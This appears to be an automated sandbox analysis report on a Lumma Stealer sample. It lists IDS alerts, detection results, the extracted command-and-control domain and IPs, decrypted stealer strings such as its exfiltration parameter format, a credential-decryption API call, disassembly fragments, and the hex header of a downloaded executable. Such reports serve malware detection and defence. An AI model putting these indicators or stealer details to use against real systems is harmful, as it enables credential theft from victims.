                      2024-11-23T12:47:30.610883+010020498121A Network Trojan was detected192.168.2.449747104.21.88.250443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-23T12:47:25.179692+010020576471Domain Observed Used for C2 Detected192.168.2.449741172.67.184.174443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-23T12:47:15.408983+010020185811A Network Trojan was detected192.168.2.449734192.81.132.7680TCP
                      2024-11-23T12:47:17.087141+010020185811A Network Trojan was detected192.168.2.449735192.81.132.7680TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-23T12:47:15.408983+010020197142Potentially Bad Traffic192.168.2.449734192.81.132.7680TCP
                      2024-11-23T12:47:17.087141+010020197142Potentially Bad Traffic192.168.2.449735192.81.132.7680TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-23T12:47:23.653246+010020576461Domain Observed Used for C2 Detected192.168.2.4642411.1.1.153UDP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-23T12:47:40.236614+010020480941Malware Command and Control Activity Detected192.168.2.449752104.21.88.250443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-23T12:47:13.972120+010028033053Unknown Traffic192.168.2.449731104.20.3.235443TCP
                      2024-11-23T12:47:15.677699+010028033053Unknown Traffic192.168.2.449733104.20.3.235443TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: https://revirepart.biz/Avira URL Cloud: Label: malware
                      Source: 24.2.zbjnkzvo4cc.exe.68c11000.3.unpackMalware Configuration Extractor: LummaC {"C2 url": ["revirepart.biz"]}
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeReversingLabs: Detection: 26%
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeReversingLabs: Detection: 26%
                      Source: SystemCoreHelper.dllReversingLabs: Detection: 18%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: C:\Users\user\AppData\Roaming\gdi32.dllJoe Sandbox ML: detected
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.dllJoe Sandbox ML: detected
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.dllJoe Sandbox ML: detected
                      Source: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpString decryptor: revirepart.biz
                      Source: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                      Source: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpString decryptor: TeslaBrowser/5.5
                      Source: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpString decryptor: - Screen Resoluton:
                      Source: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpString decryptor: - Physical Installed Memory:
                      Source: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpString decryptor: Workgroup: -
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_2_025BA4DA CryptUnprotectData,26_2_025BA4DA
                      Source: SystemCoreHelper.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
                      Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49730 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49732 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.184.174:443 -> 192.168.2.4:49741 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49744 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49747 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49748 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49749 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49751 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49752 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49754 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49762 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49764 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49780 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49782 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49808 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49814 version: TLS 1.2
                      Source: SystemCoreHelper.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: %%.pdb source: mxtvcgq32fe.exe, 0000001E.00000002.2217512599.000000000098A000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: $dq7C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.pdb source: rundll32.exe, 0000000A.00000002.2603536788.0000000005031000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: zbjnkzvo4cc.exe, 00000018.00000002.2243599041.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: zbjnkzvo4cc.exe, 00000018.00000002.2243599041.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: $dq7C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.pdb source: rundll32.exe, 00000003.00000002.2634374806.00000000048E1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: n0C:\Windows\mscorlib.pdb source: zbjnkzvo4cc.exe, 00000018.00000002.2242896029.00000000008FA000.00000004.00000010.00020000.00000000.sdmp, mxtvcgq32fe.exe, 0000001E.00000002.2217512599.000000000098A000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\Temp\mxtvcgq32fe.PDB source: mxtvcgq32fe.exe, 0000001E.00000002.2217512599.000000000098A000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: zbjnkzvo4cc.exe, 00000018.00000002.2243599041.0000000000B7C000.00000004.00000020.00020000.00000000.sdmp, mxtvcgq32fe.exe, 0000001E.00000002.2217869048.0000000000CEC000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdbKBQ source: mxtvcgq32fe.exe, 0000001E.00000002.2217869048.0000000000CEC000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbTAK source: mxtvcgq32fe.exe, 0000001E.00000002.2217869048.0000000000CEC000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\Temp\zbjnkzvo4cc.PDB source: zbjnkzvo4cc.exe, 00000018.00000002.2242896029.00000000008FA000.00000004.00000010.00020000.00000000.sdmp
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-4E0E29DCh]24_2_68C294D0
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+00000148h]24_2_68C1F496
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+00000148h]24_2_68C1F496
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 4x nop then mov edi, esi24_2_68C16CB0
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+30h]24_2_68C17C70
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 4x nop then add eax, dword ptr [esp+edx*4+30h]24_2_68C17C70
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 4x nop then mov ebx, eax24_2_68C12C20
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 4x nop then mov byte ptr [eax], dl24_2_68C3DC30
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 4x nop then movzx edi, byte ptr [esp+ebx+1Ch]24_2_68C1E5EC
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 4x nop then mov ebx, esi24_2_68C1C9BE
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+74h]24_2_68C1B150
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], A2545BF7h24_2_68C52D70
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]24_2_68C1BD7E
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 4x nop then mov edx, ecx24_2_68C36910
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+28421CC0h]24_2_68C52930
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 4x nop then mov edi, eax24_2_68C19EE0
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+74h]24_2_68C19EE0
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 4x nop then mov di, 0008h24_2_68C14E86
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 4x nop then mov byte ptr [edi], dl24_2_68C1DE8D
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 4x nop then mov word ptr [eax], cx24_2_68C2DE40
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 4x nop then mov word ptr [eax], cx24_2_68C1D252
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 4x nop then movzx esi, byte ptr [ebx+ecx-18254539h]24_2_68C1D252
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 1B6183F2h24_2_68C1EBD9
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 4x nop then push ebx24_2_68C1C703
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h24_2_68C52F00
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 4x nop then lea ecx, dword ptr [esp+00000A28h]24_2_68C1EB14
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edi, eax26_2_025A9AE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+74h]26_2_025A9AE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edi], dl26_2_025ADA8D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h26_2_025E2B00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edx], al26_2_025CF3ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edi, byte ptr [esi+eax+0000009Ch]26_2_025CE398
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edx], cl26_2_025CEB98
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-4E0E29DCh]26_2_025B90D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]26_2_025AB97E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 5B126FE8h26_2_025E27D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+74h]26_2_025AAD50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+28421CC0h]26_2_025E2530
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ebx, esi26_2_025AC5BE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx26_2_025BDA40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ecx+esi*8], 4F699CD4h26_2_025E3260
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov di, 0008h26_2_025A4A31
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [eax]26_2_025DDAC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+30h]26_2_025BE2F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ecx], al26_2_025BE2F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]26_2_025CCAB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx]26_2_025CB340
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax26_2_025BBB10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then push ebx26_2_025AC303
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [ebx], cx26_2_025BEFF5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp word ptr [ebp+eax+02h], 0000h26_2_025BEFF5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp word ptr [edx+ecx+02h], 0000h26_2_025BFB20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [ecx], dx26_2_025BFB20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax26_2_025C6BD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [ebp+eax-00000880h]26_2_025C6BD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, word ptr [edi]26_2_025C6BD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, ecx26_2_025C6BD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h26_2_025CD040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+30h]26_2_025A7870
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then add eax, dword ptr [esp+edx*4+30h]26_2_025A7870
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax26_2_025CE06F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov dl, EAh26_2_025E1860
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax26_2_025CE039
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [eax], dl26_2_025CD830
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ebx, eax26_2_025A2820
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebx, byte ptr [esp+esi-3E780BCDh]26_2_025CA0D5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx]26_2_025CB0FA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax26_2_025CE007
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+00000148h]26_2_025AF096
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+00000148h]26_2_025AF096
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edi, esi26_2_025A68B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], A2545BF7h26_2_025E2970
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov dl, EAh26_2_025E1930
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [edx], di26_2_025BFF7F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edi, byte ptr [esp+ebx+1Ch]26_2_025AE1EC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebx, byte ptr [edx]26_2_025D79E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h26_2_025C5190
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx26_2_025ACE52
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [ebx+ecx-18254539h]26_2_025ACE52
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ecx], dl26_2_025CDE10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax26_2_025C6E00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [ebp+eax-00000880h]26_2_025C6E00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, word ptr [edi]26_2_025C6E00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, ecx26_2_025C6E00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-6032535Eh]26_2_025C96F4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, edi26_2_025BF6E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ebx, ecx26_2_025BF6E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [edx], di26_2_025BFF7F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax26_2_025C6F70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [ebp+eax-00000880h]26_2_025C6F70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, word ptr [edi]26_2_025C6F70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, ecx26_2_025C6F70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then lea ecx, dword ptr [esp+00000A28h]26_2_025AE714
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 1B6183F2h26_2_025AE7D9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, ecx26_2_025BC7C9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [ebx], cx26_2_025BEFF5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp word ptr [ebp+eax+02h], 0000h26_2_025BEFF5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edi, byte ptr [esi+eax+0000009Ch]26_2_025CEF87
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-000000D3h]26_2_025BBFB6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]26_2_025CD4A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+2C0C617Eh]26_2_025BDD48
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax+00000404h]26_2_025CFD65
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edi, eax26_2_025CFD65
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, ecx26_2_025C6510
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov esi, ecx26_2_025C9520
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeCode function: 4x nop then mov byte ptr [eax], dl30_2_0058F670
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeCode function: 4x nop then mov word ptr [eax], cx30_2_0057F880
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h30_2_005A4940
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+28421CC0h]30_2_005A4370
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-4E0E29DCh]30_2_0057AF10

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2018581 - Severity 1 - ET MALWARE Single char EXE direct download likely trojan (multiple families) : 192.168.2.4:49734 -> 192.81.132.76:80
                      Source: Network trafficSuricata IDS: 2018581 - Severity 1 - ET MALWARE Single char EXE direct download likely trojan (multiple families) : 192.168.2.4:49735 -> 192.81.132.76:80
                      Source: Network trafficSuricata IDS: 2057646 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (revirepart .biz) : 192.168.2.4:64241 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2057647 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (revirepart .biz in TLS SNI) : 192.168.2.4:49741 -> 172.67.184.174:443
                      Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49752 -> 104.21.88.250:443
                      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49741 -> 172.67.184.174:443
                      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49741 -> 172.67.184.174:443
                      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49744 -> 104.21.88.250:443
                      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49744 -> 104.21.88.250:443
                      Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49747 -> 104.21.88.250:443
                      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49747 -> 104.21.88.250:443
                      Source: Malware configuration extractorURLs: revirepart.biz
                      Source: unknownDNS query: name: pastebin.com
                      Source: unknownDNS query: name: api.telegram.org
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 23 Nov 2024 11:47:15 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Fri, 22 Nov 2024 15:53:53 GMTETag: "af000-6278263cd54f1"Accept-Ranges: bytesContent-Length: 716800Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 72 a8 40 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 f2 01 00 00 fa 08 00 00 00 00 00 0a 60 0b 00 00 20 09 00 00 20 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0b 00 00 04 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 26 09 00 57 00 00 00 00 20 0b 00 40 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0b 00 08 00 00 00 00 00 00 00 00 00 00 00 00 20 09 00 48 00 00 00 00 00 00 00 00 00 00 00 6d 09 40 19 6b 07 61 16 5c ef 08 00 00 20 00 00 00 f0 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 65 78 74 00 00 00 80 ef 01 00 00 20 09 00 00 f0 01 00 00 f4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 40 06 00 00 00 20 0b 00 00 08 00 00 00 e4 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 0b 00 00 02 00 00 00 ec 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 10 00 00 00 00 60 0b 00 00 02 00 00 00 ee 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 